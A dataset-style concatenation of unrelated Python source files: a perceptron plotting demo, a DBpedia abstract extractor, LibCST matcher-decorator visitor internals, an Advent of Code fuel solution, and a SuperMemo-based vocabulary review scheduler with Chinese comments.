"score": 3
} |
#### File: jimmykodes/neuron_blog_post/app.py
```python
import json
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from perceptron import Neuron
def read_data():
with open('data.json') as f:
return json.load(f)
def main():
sns.set(rc={'figure.figsize': (8, 4)})
sns.set_style('darkgrid', {'figure.facecolor': '#dddddd', 'axes.facecolor': '#dddddd'})
n = Neuron(number_of_inputs=2, training_rate=.1)
data = read_data()
X = data['X']
y = data['y']
error = n.run(X, y)
df = pd.DataFrame(data=enumerate(error), columns=['iteration', 'error'])
plt.subplot(1, 2, 1)
sns.lineplot(x='iteration', y='error', data=df)
plot_data = []
for i, point in enumerate(X):
prediction = n.predict(point)
label = y[i]
if prediction == label:
plot_data.append([*point, label])
else:
plot_data.append([*point, 'error'])
df2 = pd.DataFrame(data=plot_data, columns=['x', 'y', 'label'])
plt.subplot(1, 2, 2)
sns.scatterplot(x='x', y='y', data=df2, hue='label', legend=False, palette={-1: 'blue', 1: 'green', 'error': 'red'})
plt.show()
if __name__ == '__main__':
main()
```
#### File: jimmykodes/neuron_blog_post/generate_data.py
```python
import json
import random
def generate_data(length):
data = {
'X': [],
'y': []
}
for _ in range(length):
x = random.randint(0, 500)
y = random.randint(0, 500)
label = -1 if x > y else 1
data['X'].append([x, y])
data['y'].append(label)
return data
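# Note on the labeling rule above: points with x > y (below the diagonal y = x) get label -1,
# all other points get +1, so the two classes are linearly separable and a single neuron can
# learn the boundary. For example, (400, 100) -> -1 and (100, 400) -> 1.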
def main():
data = generate_data(500)
with open('data.json', 'w+') as f:
f.write(json.dumps(data))
if __name__ == '__main__':
main()
``` |
{
"source": "jimmylai/knowledge",
"score": 3
} |
#### File: knowledge/dbpedia/get_abstract.py
```python
import re
import json
import bz2
import fileinput
__author__ = 'noahsark'
def get_abstract(string):
pat = re.compile('"(.*)"@en')
match = pat.match(string)
if match is not None:
return match.group(1)
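# The loop below parses N-Triples lines of the form
#   <subject-uri> <predicate-uri> "literal value"@en .
# and get_abstract() extracts the quoted English literal from the third field.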
items = json.load(open('entities.json'))
id_list = set(json.load(open('id_list.json')))
for line in fileinput.input():
pat = re.compile("<([^<>]*)> <([^<>]*)> (.*) .")
match = pat.match(line)
if match is not None:
if match.group(2) == 'http://www.w3.org/2000/01/rdf-schema#comment':
uri = match.group(1).decode('unicode_escape')
if uri not in id_list:
continue
if uri not in items:
items[uri] = {}
items[uri]['abstract'] = get_abstract(match.group(3)).decode('unicode_escape')
with open('entities.json', 'w') as fp:
fp.write(json.dumps(items, indent=4, ensure_ascii=False).encode('utf8'))
``` |
{
"source": "jimmylai/LibCST",
"score": 2
} |
#### File: libcst/matchers/_visitors.py
```python
from inspect import ismethod, signature
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Sequence,
Set,
Type,
TypeVar,
Union,
cast,
get_type_hints,
)
import libcst as cst
from libcst import CSTTransformer, CSTVisitor
from libcst.matchers._decorators import (
CONSTRUCTED_LEAVE_MATCHER_ATTR,
CONSTRUCTED_VISIT_MATCHER_ATTR,
VISIT_NEGATIVE_MATCHER_ATTR,
VISIT_POSITIVE_MATCHER_ATTR,
)
from libcst.matchers._matcher_base import (
AllOf,
AtLeastN,
AtMostN,
BaseMatcherNode,
MatchIfTrue,
OneOf,
matches,
)
_CSTNodeT = TypeVar("_CSTNodeT", bound=cst.CSTNode)
class MatchDecoratorMismatch(Exception):
# pyre-ignore We don't care about the type of func, just that its callable.
def __init__(self, func: Callable[..., Any], message: str) -> None:
super().__init__(
f"Invalid function signature for {func.__qualname__}: {message}"
)
def _get_possible_match_classes(matcher: BaseMatcherNode) -> List[Type[cst.CSTNode]]:
if isinstance(matcher, (OneOf, AllOf)):
return [getattr(cst, m.__class__.__name__) for m in matcher.options]
else:
return [getattr(cst, matcher.__class__.__name__)]
def _get_possible_annotated_classes(annotation: Type[object]) -> List[Type[object]]:
if getattr(annotation, "__origin__", None) is Union:
return getattr(annotation, "__args__", [])
else:
return [annotation]
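# For example, an annotation of Union[cst.Name, cst.Attribute] unpacks to
# [cst.Name, cst.Attribute], while a plain annotation such as cst.Name is
# returned as the single-element list [cst.Name].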
def _get_valid_leave_annotations_for_classes(
classes: Sequence[Type[cst.CSTNode]]
) -> Set[Type[object]]:
retval: Set[Type[object]] = set()
for cls in classes:
# Look up the leave annotation for each class, combine them so we get a list of
# all possible valid return annotations. It's not really possible for us (or
# pyre) to fully enforce return types given the presence of OneOf/AllOf matchers, so
# we do the best we can by taking a union of all valid return annotations.
# TODO: We could possibly teach LibCST codegen to generate a mapping of class
# to valid leave annotations when it generates leave_<Node> methods, but for
# now this is functionally identical. That would get rid of the need to provide
# a namespace here, as well as a gross getattr on the CSTTransformer class.
meth = getattr(cst.CSTTransformer, f"leave_{cls.__name__}")
namespace: Dict[str, object] = {
**{x: getattr(cst, x) for x in dir(cst)},
"cst": cst,
"libcst": cst,
}
type_hints = get_type_hints(meth, namespace, namespace)
if "return" in type_hints:
retval.update(_get_possible_annotated_classes(type_hints["return"]))
return retval
def _verify_return_annotation(
possible_match_classes: Sequence[Type[cst.CSTNode]],
# pyre-ignore We only care that meth is callable.
meth: Callable[..., Any],
decorator_name: str,
*,
expected_none: bool,
) -> None:
type_hints = get_type_hints(meth)
if expected_none:
# Simply look for any annotation at all and if it exists, verify that
# it is "None".
if type_hints.get("return", type(None)) is not type(None): # noqa: E721
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} should only decorate functions that do "
+ "not return.",
)
else:
if "return" not in type_hints:
# Can't check this, type annotation not supplied.
return
possible_annotated_classes = _get_possible_annotated_classes(
type_hints["return"]
)
possible_returns = _get_valid_leave_annotations_for_classes(
possible_match_classes
)
# Look at the union of specified return annotation, make sure that
# they are all subclasses of the original leave_<Node> return
# annotations. This catches when somebody tries to return a new node
# that we know can't fit where the existing node was in the tree.
for ret in possible_annotated_classes:
for annotation in possible_returns:
if issubclass(ret, annotation):
# This annotation is a superclass of the possible match,
# so we know that the types are correct.
break
else:
# The current ret was not a subclass of any of the annotated
# return types.
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} decorated function cannot return "
+ f"the type {ret.__name__}.",
)
pass
def _verify_parameter_annotations(
possible_match_classes: Sequence[Type[cst.CSTNode]],
# pyre-ignore We only care that meth is callable.
meth: Callable[..., Any],
decorator_name: str,
*,
expected_param_count: int,
) -> None:
# First, verify that the number of parameters is sane.
meth_signature = signature(meth)
if len(meth_signature.parameters) != expected_param_count:
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} should decorate functions which take "
+ f"{expected_param_count} parameter"
+ ("s" if expected_param_count > 1 else ""),
)
# Finally, for each parameter, make sure that the annotation includes
# each of the classes that might appear given the match string. This
# can be done in the simple case by just specifying the correct cst node
# type. For complex matches that use OneOf/AllOf, this could be a base class
# that encompasses all possible matches, or a union.
params = [v for k, v in get_type_hints(meth).items() if k != "return"]
for param in params:
# Go through each possible matcher, and make sure that the annotation
# for types is a superclass of each matcher.
possible_annotated_classes = _get_possible_annotated_classes(param)
for match in possible_match_classes:
for annotation in possible_annotated_classes:
if issubclass(match, annotation):
# This annotation is a superclass of the possible match,
# so we know that the types are correct.
break
else:
# The current match was not a subclass of any of the annotated
# types.
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} can be called with {match.__name__} "
+ f"but the decorated function parameter annotations do "
+ f"not include this type.",
)
def _check_types(
# pyre-ignore We don't care about the type of sequence, just that its callable.
decoratormap: Dict[BaseMatcherNode, Sequence[Callable[..., Any]]],
decorator_name: str,
*,
expected_param_count: int,
expected_none_return: bool,
) -> None:
for matcher, methods in decoratormap.items():
# Given the matcher class we have, get the list of possible cst nodes that
# could be passed to the functions we wrap.
possible_match_classes = _get_possible_match_classes(matcher)
has_invalid_top_level = any(
isinstance(m, (AtLeastN, AtMostN, MatchIfTrue))
for m in possible_match_classes
)
# Now, loop through each function we wrap and verify that the type signature
# is valid.
for meth in methods:
# First thing first, make sure this isn't wrapping an inner class.
if not ismethod(meth):
raise MatchDecoratorMismatch(
meth,
"Matcher decorators should only be used on methods of "
+ "MatcherDecoratableTransformer or "
+ "MatcherDecoratableVisitor",
)
if has_invalid_top_level:
raise MatchDecoratorMismatch(
meth,
"The root matcher in a matcher decorator cannot be an "
+ "AtLeastN, AtMostN or MatchIfTrue matcher",
)
# Now, check that the return annotation is valid.
_verify_return_annotation(
possible_match_classes,
meth,
decorator_name,
expected_none=expected_none_return,
)
# Finally, check that the parameter annotations are valid.
_verify_parameter_annotations(
possible_match_classes,
meth,
decorator_name,
expected_param_count=expected_param_count,
)
def _gather_matchers(obj: object) -> Set[BaseMatcherNode]:
visit_matchers: Set[BaseMatcherNode] = set()
for func in dir(obj):
try:
for matcher in getattr(getattr(obj, func), VISIT_POSITIVE_MATCHER_ATTR, []):
visit_matchers.add(cast(BaseMatcherNode, matcher))
for matcher in getattr(getattr(obj, func), VISIT_NEGATIVE_MATCHER_ATTR, []):
visit_matchers.add(cast(BaseMatcherNode, matcher))
except Exception:
# This could be a calculated property, and calling getattr() evaluates it.
# We have no control over the implementation detail, so if it raises, we
# should not crash.
pass
return visit_matchers
def _gather_constructed_visit_funcs(
obj: object
) -> Dict[BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]]:
constructed_visitors: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = {}
for funcname in dir(obj):
try:
func = cast(Callable[[cst.CSTNode], None], getattr(obj, funcname))
except Exception:
# This could be a calculated property, and calling getattr() evaluates it.
# We have no control over the implementation detail, so if it raises, we
# should not crash.
continue
for matcher in getattr(func, CONSTRUCTED_VISIT_MATCHER_ATTR, []):
casted_matcher = cast(BaseMatcherNode, matcher)
constructed_visitors[casted_matcher] = (
*constructed_visitors.get(casted_matcher, ()),
func,
)
return constructed_visitors
# pyre-ignore: There is no reasonable way to type this, so ignore the Any type. This
# is because the leave_* methods have a different signature depending on whether they
# are in a MatcherDecoratableTransformer or a MatcherDecoratableVisitor.
def _gather_constructed_leave_funcs(
obj: object
) -> Dict[BaseMatcherNode, Sequence[Callable[..., Any]]]:
constructed_visitors: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = {}
for funcname in dir(obj):
try:
func = cast(Callable[[cst.CSTNode], None], getattr(obj, funcname))
except Exception:
# This could be a calculated property, and calling getattr() evaluates it.
# We have no control over the implementation detail, so if it raises, we
# should not crash.
continue
for matcher in getattr(func, CONSTRUCTED_LEAVE_MATCHER_ATTR, []):
casted_matcher = cast(BaseMatcherNode, matcher)
constructed_visitors[casted_matcher] = (
*constructed_visitors.get(casted_matcher, ()),
func,
)
return constructed_visitors
def _visit_matchers(
matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], node: cst.CSTNode
) -> Dict[BaseMatcherNode, Optional[cst.CSTNode]]:
new_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {}
for matcher, existing_node in matchers.items():
# We don't care about visiting matchers that are already true.
if existing_node is None and matches(node, matcher):
# This node matches! Remember which node it was so we can
# cancel it later.
new_matchers[matcher] = node
else:
new_matchers[matcher] = existing_node
return new_matchers
def _leave_matchers(
matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], node: cst.CSTNode
) -> Dict[BaseMatcherNode, Optional[cst.CSTNode]]:
new_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {}
for matcher, existing_node in matchers.items():
if node is existing_node:
# This node matches, so we are no longer inside it.
new_matchers[matcher] = None
else:
# We aren't leaving this node.
new_matchers[matcher] = existing_node
return new_matchers
def _all_positive_matchers_true(
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], obj: object
) -> bool:
requested_matchers = getattr(obj, VISIT_POSITIVE_MATCHER_ATTR, [])
for matcher in requested_matchers:
if all_matchers[matcher] is None:
# The passed in object has been decorated with a matcher that isn't
# active.
return False
return True
def _all_negative_matchers_false(
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], obj: object
) -> bool:
requested_matchers = getattr(obj, VISIT_NEGATIVE_MATCHER_ATTR, [])
for matcher in requested_matchers:
if all_matchers[matcher] is not None:
# The passed in object has been decorated with a matcher that is active.
return False
return True
def _should_allow_visit(
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], obj: object
) -> bool:
return _all_positive_matchers_true(
all_matchers, obj
) and _all_negative_matchers_false(all_matchers, obj)
def _visit_constructed_funcs(
visit_funcs: Dict[BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]],
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]],
node: cst.CSTNode,
) -> None:
for matcher, visit_funcs in visit_funcs.items():
if matches(node, matcher):
for visit_func in visit_funcs:
if _should_allow_visit(all_matchers, visit_func):
visit_func(node)
class MatcherDecoratableTransformer(CSTTransformer):
"""
This class provides all of the features of a :class:`libcst.CSTTransformer`, and
additionally supports various decorators to control when methods get called when
traversing a tree. Use this instead of a :class:`libcst.CSTTransformer` if you
wish to do more powerful decorator-based visiting.
"""
def __init__(self) -> None:
CSTTransformer.__init__(self)
# List of gating matchers that we need to track and evaluate. We use these
# in conjunction with the call_if_inside and call_if_not_inside decorators
# to determine whether or not to call a visit/leave function.
self._matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {
m: None for m in _gather_matchers(self)
}
# Mapping of matchers to functions. If in the course of visiting the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a visit_* method.
self._extra_visit_funcs: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = _gather_constructed_visit_funcs(self)
# Mapping of matchers to functions. If in the course of leaving the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a leave_* method.
self._extra_leave_funcs: Dict[
BaseMatcherNode,
Sequence[
Callable[
[cst.CSTNode, cst.CSTNode], Union[cst.CSTNode, cst.RemovalSentinel]
]
],
] = _gather_constructed_leave_funcs(self)
# Make sure visit/leave functions constructed with @visit and @leave decorators
# have correct type annotations.
_check_types(
self._extra_visit_funcs,
"visit",
expected_param_count=1,
expected_none_return=True,
)
_check_types(
self._extra_leave_funcs,
"leave",
expected_param_count=2,
expected_none_return=False,
)
def on_visit(self, node: cst.CSTNode) -> bool:
# First, evaluate any matchers that we have which we are not inside already.
self._matchers = _visit_matchers(self._matchers, node)
# Now, call any visitors that were hooked using a visit decorator.
_visit_constructed_funcs(self._extra_visit_funcs, self._matchers, node)
# Now, evaluate whether this current function has any matchers it requires.
if not _should_allow_visit(
self._matchers, getattr(self, f"visit_{type(node).__name__}", None)
):
# We shouldn't visit this directly. However, we should continue
# visiting its children.
return True
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTTransformer.on_visit(self, node)
def on_leave(
self, original_node: _CSTNodeT, updated_node: _CSTNodeT
) -> Union[_CSTNodeT, cst.RemovalSentinel]:
# First, evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers, getattr(self, f"leave_{type(original_node).__name__}", None)
):
retval = CSTTransformer.on_leave(self, original_node, updated_node)
else:
retval = updated_node
# Now, call any visitors that were hooked using a leave decorator.
for matcher, leave_funcs in reversed(list(self._extra_leave_funcs.items())):
if not matches(original_node, matcher):
continue
for leave_func in leave_funcs:
if _should_allow_visit(self._matchers, leave_func) and isinstance(
retval, cst.CSTNode
):
retval = leave_func(original_node, retval)
# Now, see if we have any matchers we should deactivate.
self._matchers = _leave_matchers(self._matchers, original_node)
# pyre-ignore The return value of on_leave is subtly wrong in that we can
# actually return any value that passes this node's parent's constructor
# validation. Fixing this is beyond the scope of this file, and would involve
# forcing a lot of ensure_type() checks across the codebase.
return retval
def on_visit_attribute(self, node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"visit_{type(node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTVisitor.on_visit_attribute(self, node, attribute)
def on_leave_attribute(self, original_node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"leave_{type(original_node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
CSTVisitor.on_leave_attribute(self, original_node, attribute)
def _transform_module_impl(self, tree: cst.Module) -> cst.Module:
return tree.visit(self)
class MatcherDecoratableVisitor(CSTVisitor):
"""
This class provides all of the features of a :class:`libcst.CSTVisitor`, and
additionally supports various decorators to control when methods get called
when traversing a tree. Use this instead of a :class:`libcst.CSTVisitor` if
you wish to do more powerful decorator-based visiting.
"""
def __init__(self) -> None:
CSTVisitor.__init__(self)
# List of gating matchers that we need to track and evaluate. We use these
# in conjunction with the call_if_inside and call_if_not_inside decorators
# to determine whether or not to call a visit/leave function.
self._matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {
m: None for m in _gather_matchers(self)
}
# Mapping of matchers to functions. If in the course of visiting the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a visit_* method.
self._extra_visit_funcs: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = _gather_constructed_visit_funcs(self)
# Mapping of matchers to functions. If in the course of leaving the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a leave_* method.
self._extra_leave_funcs: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = _gather_constructed_leave_funcs(self)
# Make sure visit/leave functions constructed with @visit and @leave decorators
# have correct type annotations.
_check_types(
self._extra_visit_funcs,
"visit",
expected_param_count=1,
expected_none_return=True,
)
_check_types(
self._extra_leave_funcs,
"leave",
expected_param_count=1,
expected_none_return=True,
)
def on_visit(self, node: cst.CSTNode) -> bool:
# First, evaluate any matchers that we have which we are not inside already.
self._matchers = _visit_matchers(self._matchers, node)
# Now, call any visitors that were hooked using a visit decorator.
_visit_constructed_funcs(self._extra_visit_funcs, self._matchers, node)
# Now, evaluate whether this current function has a decorator on it.
if not _should_allow_visit(
self._matchers, getattr(self, f"visit_{type(node).__name__}", None)
):
# We shouldn't visit this directly. However, we should continue
# visiting its children.
return True
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTVisitor.on_visit(self, node)
def on_leave(self, original_node: cst.CSTNode) -> None:
# First, evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers, getattr(self, f"leave_{type(original_node).__name__}", None)
):
CSTVisitor.on_leave(self, original_node)
# Now, call any visitors that were hooked using a leave decorator.
for matcher, leave_funcs in reversed(list(self._extra_leave_funcs.items())):
if not matches(original_node, matcher):
continue
for leave_func in leave_funcs:
if _should_allow_visit(self._matchers, leave_func):
leave_func(original_node)
# Now, see if we have any matchers we should deactivate.
self._matchers = _leave_matchers(self._matchers, original_node)
def on_visit_attribute(self, node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"visit_{type(node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTVisitor.on_visit_attribute(self, node, attribute)
def on_leave_attribute(self, original_node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"leave_{type(original_node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
CSTVisitor.on_leave_attribute(self, original_node, attribute)
``` |
{
"source": "JimmyLamothe/autofront",
"score": 2
} |
#### File: autofront/tests/simple_args.py
```python
def foo_args(arg1, arg2, arg3 = 'arg3', arg4 = 'arg4'):
print(arg1, arg2, arg3, arg4)
``` |
{
"source": "jimmy-larsson/advent-of-code",
"score": 4
} |
#### File: days/day1/solution.py
```python
def read_input(file_path: str):
with open(file_path, "r") as file:
return [int(line) for line in file.readlines()]
def part1(inputs: list):
return sum([(mass // 3 - 2) for mass in inputs])
def part2(inputs: list):
mass_total = 0
for mass in inputs:
module_total_mass = 0
fuel_mass = calculate_fuel_cost_from_mass(mass)
while fuel_mass > 0:
module_total_mass += fuel_mass
fuel_mass = calculate_fuel_cost_from_mass(fuel_mass)
mass_total += module_total_mass
return mass_total
def calculate_fuel_cost_from_mass(mass: int):
return mass // 3 - 2
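# Illustrative check of the part 2 loop: a module of mass 1969 needs
# 654 + 216 + 70 + 21 + 5 = 966 fuel in total; the next step (5 // 3 - 2) is
# negative, which ends the while loop.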
if __name__ == "__main__":
print(f"Part 1: {part1(read_input('input_part1.txt'))}")
print(f"Part 2: {part2(read_input('input_part2.txt'))}")
``` |
{
"source": "jimmylchen/nirvana",
"score": 3
} |
#### File: nirvana/fetch/fetch.py
```python
import requests
# Generic helper that sends an HTTP GET request to the endpoint and then uses converter to transform the response into a sensible data model
def fetch(endpoint, converter):
print(f"Fetching from endpoint: {endpoint}")
response = requests.get(endpoint)
return converter(response)
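# Minimal usage sketch (the endpoint and converter below are hypothetical, not part of this repo):
#   items = fetch("https://api.example.com/items", lambda response: response.json())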
``` |
{
"source": "jimmylee412/Updated-supermemo",
"score": 3
} |
#### File: jimmylee412/Updated-supermemo/backstage.py
```python
import math
import time
import numpy as np
import random
import json
from collections import defaultdict
from datetime import datetime,timedelta
import json
import zidian_1
class caculate():
def __init__(self):
# Open the various json files
with open('fbdict.json', 'r', encoding='utf-8') as json_file: # feedback dictionary recording how each word was recalled in the last session
fbdict = json.loads(json_file.read())
self.fbdict = json.loads(fbdict)
with open('messstatus.json', 'r', encoding='utf-8') as json_file: # messstatus.json records which words get confused with each other
messstatus = json.loads(json_file.read())
self.messstatus = json.loads(messstatus)
with open('status.json', 'r', encoding='utf-8') as json_file: # status.json records each word's review history and next review date
status = json.loads(json_file.read())
self.status = json.loads(status)
try: # open the vocabulary file, guarding against it being missing or empty
with open('vocabulary.json', 'r', encoding='utf-8') as json_file:
vocabulary = json.loads(json_file.read())
self.vocabulary = json.loads(vocabulary)
except:
print("单词本中空空如也")
# Initialize variables
self.times = 0
self.lastinterval = 0
self.EF = 0
self.q_factor = 0
self.nextdate = 0
self.localtime = time.localtime(time.time())
self.localdate = time.asctime(self.localtime)
# Get the date on which a word should next be reviewed
def getnextdate(self, word, interval,status):
nexttime = time.localtime(time.time() + interval * 86400) # interval is in days
nextdate = str(nexttime.tm_year) + "-" + str(nexttime.tm_mon) + "-" + str(nexttime.tm_mday)
# If the word was recalled correctly, record the next review date normally; if it was missed, force another review today
if status ==0 :
self.status[word][0] = nextdate
elif status ==1:
localtime = time.localtime(time.time())
self.status[word][0] = str(localtime.tm_year) + "-" + str(localtime.tm_mon) + "-" + str(localtime.tm_mday)
# Either way, record the total number of reviews and the interval; later analysis needs them
self.status[word][1] += 1
self.status[word][2] = interval
# Compute the interval between this review and the next one
def ginterval(self, times, EF, lastinterval):
if times == 1:
interval = 1
elif times == 2:
interval = 6
else:
interval = lastinterval * EF
interval = int(round(interval))
return interval
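# Sketch of the resulting SM-2 schedule: with the default EF of 2.5 the intervals grow as
# 1, 6, 15, 38, ... days, since every interval after the second is the previous one times EF, rounded.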
# Update the Easiness Factor (EF), staying as close as possible to the original SuperMemo (SM-2) algorithm
def update(self, oldEF, q_factor):
newEF = oldEF + (0.1 - (5 - q_factor) * (0.08 + (5 - q_factor) * 0.02)) # Easiness Factor update, copied from the original SM-2 formula
if newEF < 1.3: # clamp EF to the valid range to avoid errors
EF = 1.3
elif newEF > 2.5:
EF = 2.5
else:
EF = newEF
return EF
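# Worked example of the update above: oldEF = 2.5 and q_factor = 3 give
# newEF = 2.5 + (0.1 - 2 * (0.08 + 2 * 0.02)) = 2.36, so harder answers pull EF toward the 1.3 floor.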
# Helper for computing percentiles
def quantile_p(self, data, p):
a = np.array(data)
try:
Q = np.percentile(a, p)
except:
Q = 0
return Q
# Pre-process the words that were confused with one another during review
def get_confusing_word(self):
confusing = []
# For answers where the wrong option was chosen, replace the stored meaning in fbdict with the word it belongs to
for word in list(self.fbdict.keys()):
if self.fbdict[word][0] != "True":
self.fbdict[word] = list(self.fbdict[word]) # stored as a tuple; convert to a list so it can be modified
origin_word = [x for x, y in self.vocabulary.items() if self.fbdict[word][0] in list(y)] # in theory one meaning may belong to several words
if len(origin_word) != 0:
del self.fbdict[word][0] # replace the confused meaning with the word it belongs to
self.fbdict[word].insert(0,origin_word[0])
else:
pass
self.fbdict[word] = tuple(self.fbdict[word]) # convert back to a tuple
# Main calculation: update each word's next review time and the confusion relations between words
def cnt(self): # compute each word's next review date and update its status
timelist1 = [] # response times of correctly recalled words
timelist2 = [] # response times of incorrectly recalled words
for word in list(self.fbdict.keys()): # collect every word's response time for later analysis
if self.fbdict[word][0] == "True":
timelist1.append(self.fbdict[word][1])
else:
timelist2.append(self.fbdict[word][1])
# Average response time of the correctly recalled words
nsum = 0
for i in range(len(timelist1)):
nsum += timelist1[i]
try:
ave_time = nsum / len(timelist1)
except:
ave_time = 0
# Split the correct words into above-average and below-average response-time groups for analysis
list_above_ave = []
list_below_ave = []
for time in timelist1:
if time >= ave_time:
list_above_ave.append(time)
if time < ave_time:
list_below_ave.append(time)
Q1 = self.quantile_p(list_below_ave, 50) # median of the below-average response times
Q2 = self.quantile_p(timelist2, 50)
Q3 = self.quantile_p(timelist2, 75)
# requirement and descriptions in Super memo 2                          # in our App
# q_factor should be 0-5:
# 5 - perfect response                                                   # 5 - correct, faster than the median of the below-average group
# 4 - correct response after a hesitation                                # 4 - correct, slower than that median but still below the average
# 3 - correct response recalled with serious difficulty                  # 3 - correct, slower than the average of the correct group
# 2 - incorrect response; where the correct one seemed easy to recall    # 2 - incorrect, response time above the 66th percentile
# 1 - incorrect response; the correct one remembered                     # 1 - incorrect, response time between the 33.3rd and 66.6th percentiles
# 0 - complete blackout.                                                 # 0 - incorrect, response time below the 33.3rd percentile
# Update q_factor
for word in list(self.fbdict.keys()):
if word in self.status:
pass
else:
self.status[word] = ["", 0, 1, 2.5] # 初始化水平
#读取文件记录的上一次的总背诵次数,旧的EF数据,旧的时间间隔,用于分析
times = self.status[word][1]
oldEF = self.status[word][3]
lastinterval = self.status[word][2]
# Grade the answer and update q_factor
if self.fbdict[word][0] == "True":
if self.fbdict[word][1] <= ave_time: # corresponds to q_factor 4/5 in the SM algorithm; the two grades are assigned by response time
if self.fbdict[word][1] <= Q1:
self.q_factor = 5
else:
self.q_factor = 4
if self.fbdict[word][1] > ave_time:
self.q_factor = 3
status = 0
else: # update the confusable words and compute q_factor 0, 1 or 2 for wrong answers
self.get_confusing_word() # replace stored meanings with their words
word_f = self.fbdict[word][0]
# Normalize the number of decimal places
word_t_str = str(self.fbdict[word][1])
a, b, c = word_t_str.partition(".")
word_t = float(".".join([a, c[:2]]))
# Record the confusions the user made while reviewing; the "degree" of confusion is scored with the reciprocal of the response time - the faster the wrong answer, the more reflexive and therefore the more serious the confusion
if word in self.messstatus:
if word_f in self.messstatus[word]:
self.messstatus[word][word_f] += round(math.log(1 + 1 / word_t),2)
else:
self.messstatus[word][word_f] = round(math.log(1 + 1 / word_t),2)
else:
self.messstatus[word] = {}
self.messstatus[word][word_f] = round(math.log(1 + 1 / word_t),2)
sorted(self.messstatus[word],reverse=True) # intended to rank the words by degree of confusion for later ordering (note: the result of sorted() is discarded here)
# Update q_factor: wrong answers receive a grade of 0, 1 or 2
if self.fbdict[word][1] > Q2:
self.q_factor = 0
elif self.fbdict[word][1] < Q2 and self.fbdict[word][1] > Q3:
self.q_factor = 2
elif self.fbdict[word][1] < Q3:
self.q_factor = 1
# If the word was answered wrongly, restart its schedule and review it again today
lastinterval = 1
status = 1
# Update the status dictionary with the word's next review date
EF = self.update(oldEF, self.q_factor)
self.status[word][3] = EF # store the updated EF
if lastinterval != 1: # when a word was answered wrongly, memorization starts over from interval 1
interval = self.ginterval(times, EF, lastinterval)
else:
interval = self.ginterval(times, 1, lastinterval)
self.getnextdate(word, interval,status)
# Persist all changes
self.store()
# Record the confusable words the user typed in manually while reviewing; this function is only used when such words are added by hand
def add_new_word(self,fbdict2):
for word, word_list in list(fbdict2.items()):
try: # pass the manually entered list of confusable words to the lookup function and get back a dictionary
meaningdict = zidian_1.add_word(word_list) # returns the newly added words and their meanings {word: [meaning]}; only words whose meanings were found are included
except:
print("出现未知错误")
pass
else:
for word2 in list(meaningdict.keys()):
# Add the manually entered confusable word to the vocabulary
if word2 in self.vocabulary.keys():
pass
else:
self.vocabulary.update({word2: meaningdict[word2]})
# Add the manually entered confusable word to this word's confusion dictionary
if word in self.messstatus: # the word has been answered wrongly before
if word2 in self.messstatus[word]: # this particular confusion has been recorded before
self.messstatus[word][word2] = 100
else:
self.messstatus[word][word2] = 100 # arbitrary large value so this word sorts first and is reviewed right after the scheduled words
else:
self.messstatus[word] = {word2:100}
self.store()
# Write everything back to disk
def store(self):
json_fbdict = json.dumps(self.fbdict, sort_keys=False, ensure_ascii= False)
json_messstatus = json.dumps(self.messstatus,sort_keys=False, ensure_ascii= False)
json_status = json.dumps(self.status,sort_keys=False, ensure_ascii= False)
json_vocabulary = json.dumps(self.vocabulary, sort_keys=False, ensure_ascii=False)
with open('fbdict.json', 'w', encoding='utf-8') as json_file:
json.dump(json_fbdict, json_file, ensure_ascii= False)
with open('messstatus.json', 'w', encoding='utf-8') as json_file:
json.dump(json_messstatus, json_file, ensure_ascii=False)
with open('status.json', 'w', encoding='utf-8') as json_file:
json.dump(json_status, json_file, ensure_ascii=False)
with open('vocabulary.json', 'w', encoding='utf-8') as json_file:
json.dump(json_vocabulary, json_file, ensure_ascii=False)
